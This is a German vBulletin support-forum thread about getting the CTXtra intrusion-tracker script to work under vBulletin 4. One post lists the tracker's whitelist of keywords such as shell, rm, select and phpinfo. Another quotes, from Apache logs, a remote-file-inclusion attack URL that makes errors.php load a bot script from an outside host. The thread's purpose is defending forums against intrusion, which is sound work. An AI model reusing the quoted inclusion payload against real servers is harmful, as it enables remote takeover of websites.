Sicherheitssoftware CTXtra
Hallo 31 Juli 2010, 23:42:00 *
Willkommen Gast. Bitte einloggen oder registrieren.

Einloggen mit Benutzername, Passwort und SitzungslängeSorry, Du musst für die Shout Box eingeloggt sein!
News: Wir suchen Übersetzer für andere Sprachen.
 
  Übersicht Hilfe Suche Einloggen Registrieren  
Seiten: [1]   Nach unten
  Drucken  
Autor Thema: CTXtra und problematisches VB 4.0.1  (Gelesen 1120 mal)
0 Mitglieder und 1 Gast betrachten dieses Thema.
Uwe
Betatester
Jr. Member
****
Offline Offline

Geschlecht: Männlich
Beiträge: 58


vBulletin 3.7.1


« am: 13 Februar 2010, 01:45:24 »

Was bis VB 3.7.1 schön funzte bis CTXtra 1.6 Beta macht ab VB 4 ziemliche Probleme.

Ich hab den CTXtra 1.6 Beta unter VB 4.0.1 getestet.
Einbau wie gewohnt.
Der Testlauf war ziemlich broblematisch. Angefangen von Templatefehlermeldungen des VB im Browser bis zum Nichtanzeigen des Footer. Die Variable $ctxtra_footer bringt hier kein Ergebniss.
Auch "require_once('/DEIN-ABSOLUTER-PFAD/ctracker/ctracker.php');" zeigt kein Ergebniss. Die Testvariable ?ctxtra_dummy zeigt das der Tracker läuft. Es gibt aber mit der V. 1.6 massive Templatefehlermeldungen.
Ich habe dann mal den CTxtra_v1.5.08 getestet. Gleiches Ergebniss. Erst mit dem Aufruf "include_once("ctracker/ctracker.php");" ging es. Keine Templatefehler mehr. Der Test mit ?ctxtra_dummy war negativ. Aber der Zufall wollte es das ich mich Aussperrte. Also lief der Tracker. Nur scheinen die Variablen des Trackers nicht richtig durchzulaufen.

Hier meine Withelist:

type=deleted,
moderation.php,
order=desc,
order=asc,
dowhat=delete,
do=dodeletethreads,
do=phpinfo,
do=kill,
do=,
do=posts,
do=events,
search[ordering],
search[orderby],
do=delete,
goto=,
phpmyadmin,
phpinfo,
img src,
.conf,
delete,
g,
order,
order=,
deleteid=,
/mail,
php_,
",
<,
http://,
_post,
do=productkill,
do=productdelete,
do=server_modules,
server_,
productkill,
shell,
mail=,
request,
select,
www.,
df ,
df,
java,
rm,
',
,goto=

Der Test im Footer mit: <a href="'.$ctxtra_url.'" target="_blank">CTXtra</a> war auch negativ.
Also laufen die Variablen nicht durch.

Den Footer hab ich im Moment als HTML Zeile drin:

<div align="center"><a href="http://ctxtra.org/" target="_blank">Sicherheitssoftware: <b>CTXtra</b></a></div>

@ Martin und Schlumpfi.

Ich weiss das ihr im Moment wenig Zeit habt. Die Entwicklung der 1.6 scheint ja auch zu stagnieren. Ich würde nur ungern und bestimmt andere User auch auf das Script verzichten wollen. Geht die Entwicklung weiter bzw. wie kann man das fixen ? Bis VB 3.7.1 war alles easy. Ab VB 4 geht fast nix mehr. Schaut mal bitte die Withelist mit durch. Einiges gehört eigentlich geblacklistet denke ich, aber das VB ist sehr empflindlich wie es scheint.

@ Schlumpfi

Danke für die PN und die Antwort auf meinen letzten Post. Mich würde bei Gelegenheit interessieren wie du das mit den Scripten meinst, bzw. wie ich über die errors.php im CTXtra eine IP Blacklist erzeuge so das die auch nicht nur über die Einstiegsseite ausgesperrt werden. Aber das dürfte best. nur Serverseitig zu lösen sein denke ich. Dann wären die Hacker ausgesperrt Smiley

@ Martin

Mache bitte endlich das nervige Banner weg. Ich kriege nen Krampf in der rechten Hand wenn ich den immer schieben muss.

Gruss Uwe
« Letzte Änderung: 13 Februar 2010, 01:56:01 von Uwe » Gespeichert

schlumpfi
Moderator
Hero Member
*****
Offline Offline

Beiträge: 1.228



« Antworten #1 am: 13 Februar 2010, 13:19:54 »

hallo uwe,

ja, im vb4 ist ziemlich viel recodet worden, das in der 3er schön funzte.
ehrlich gesagt hab ich mir die 4er noch nicht genau angesehen, man sieht aber dennoch einige grössere änderungen.

wie es mit ct1.6beta bzw der 1.5  aussieht, habe ich noch nicht getestet...

local hab ich einige ansätze, wie zb das mit dem footer umgangen... denke dieser würde auch in der vb4 funzen.

btw //
das angesprochene script  basiert auf ip catchen und das manuelle einschreiben in die liste via php.
alle aufrufe der errors.php werden in die ipliste des ctxtra eingetragen...
hier must du aber noch unterscheiden zwischen "böse" und "gut" Smiley
« Letzte Änderung: 13 Februar 2010, 13:24:37 von schlumpfi » Gespeichert

Man muß nicht alles wissen, man muß nur wissen, wo es steht!
Uwe
Betatester
Jr. Member
****
Offline Offline

Geschlecht: Männlich
Beiträge: 58


vBulletin 3.7.1


« Antworten #2 am: 14 Februar 2010, 00:42:40 »

@ schlumpfi

Danke für die Antwort.
Wäre interessant wie du den Footer machen würdest. Codesnippet ?
Hab mich nämlich an den Zähler im Footer gewöhnt Smiley

Zur error.php

Es ist nicht das Ziel zwischen "gut" und "böse" zu unterscheiden. Wer diese Datei aufruft bzw. versucht über eine Weiterleitung einen Schadcode nachzuladen wie ich aus den Apachelogs sehe der gehört Ausgesperrt. Die Syntax ist immer dieselbe: zb. h**p://meine.url/errors.php?error=http://takeover.fileave.com/bash**.txt?. Hab mir mal einige dieser texte geladen und angeschaut. Da wird eindeuitig ein Script nachgeladen welches Schadecode ausführt bzw. auf dem Server einen Both installiert und den Server fernsteuerbar macht. Solche Übeltäter gehören ausgesperrt. Wenn ich mich recht entsinne ist das Query ( URL ) schon im Tracker mit drin. Habs mal in den Logs gesehen. Da sind schon welche rausgeflogen hihi. Habs aber auch sogar mit meinem Script schon geschafft. Wie beschrieben, wenn das bei mir einer aufruft wird seine IP mit einer Datenbank verglichen welche Weltweite Ranges enthält ( 8 Mb gross). Länder kann man in einem Array in der errors.php eintragen. Es werden dann nur die IP der eingetragenen Länder verglichen. Im Moment sind 6 Länder geblacklistet. Deutschland auch. Es fliegen sozusagen fast alle bösen ( Italien, Frankreich, Ru, GER, Afrika, Niederlande ) raus. Von dort kamen du meisten versuchten Angriffe. Interessant wäre wenn du mir verraten würdest wie ich das mit dem CTXtra kombinieren kann. Da ergeben sich gute Möglichkeiten auch für andere solchen Verbrechern vorzubeugen. Gern auch per PN wenn du magst. Wenn Interesse besteht kannst du auch gern mein Script bekommen per PN oder ich lade mal zu einem Hoster hoch weil es hier als Anhang zu gross sein dürfte.

Gruss Uwe
« Letzte Änderung: 14 Februar 2010, 01:06:48 von Uwe » Gespeichert

schlumpfi
Moderator
Hero Member
*****
Offline Offline

Beiträge: 1.228



« Antworten #3 am: 17 Februar 2010, 18:45:23 »

werd mal was vorbereiten, wenn ich etwas zeit habe...
Gespeichert

Man muß nicht alles wissen, man muß nur wissen, wo es steht!
schlumpfi
Moderator
Hero Member
*****
Offline Offline

Beiträge: 1.228



« Antworten #4 am: 12 März 2010, 19:30:09 »

sorry, bin derzeit etwas stark im rl eingebunden...

werde es aber nachholen, sobald etwas mehr zeit ist.

mfg + danke für euer verständnis...
Gespeichert

Man muß nicht alles wissen, man muß nur wissen, wo es steht!
blade5000
Newbie
*
Offline Offline

Beiträge: 4


E-Mail
« Antworten #5 am: 21 März 2010, 17:27:22 »

gibt es schon das prog für vb 4.0.2 und wo finde ich das CTXtra für vb 4.0.2

mfg
Gespeichert
schlumpfi
Moderator
Hero Member
*****
Offline Offline

Beiträge: 1.228



« Antworten #6 am: 12 April 2010, 17:22:22 »

hallo,

muss mich leider entschuldigen, da ich beruflich im stress stecke und auch weiterhin bin.


werde aber trotzdem versuchen diese woche mich einmal um die offenen fragen zu kümmern...
einbauanleitungen werdet ihr dann in der download sektion finden, wenn verfügbar.

danke für eure geduld!!!

mfg
Gespeichert

Man muß nicht alles wissen, man muß nur wissen, wo es steht!
Seiten: [1]   Nach oben
  Drucken  
 
Gehe zu:  

TinyPortal v.1.0.6 beta 2 © Bloc
Powered by MySQL Powered by PHP Powered by SMF 1.1.7 | SMF © 2006, Simple Machines LLC Prüfe XHTML 1.0 Prüfe CSS
Seite erstellt in 10.203 Sekunden mit 28 Zugriffen.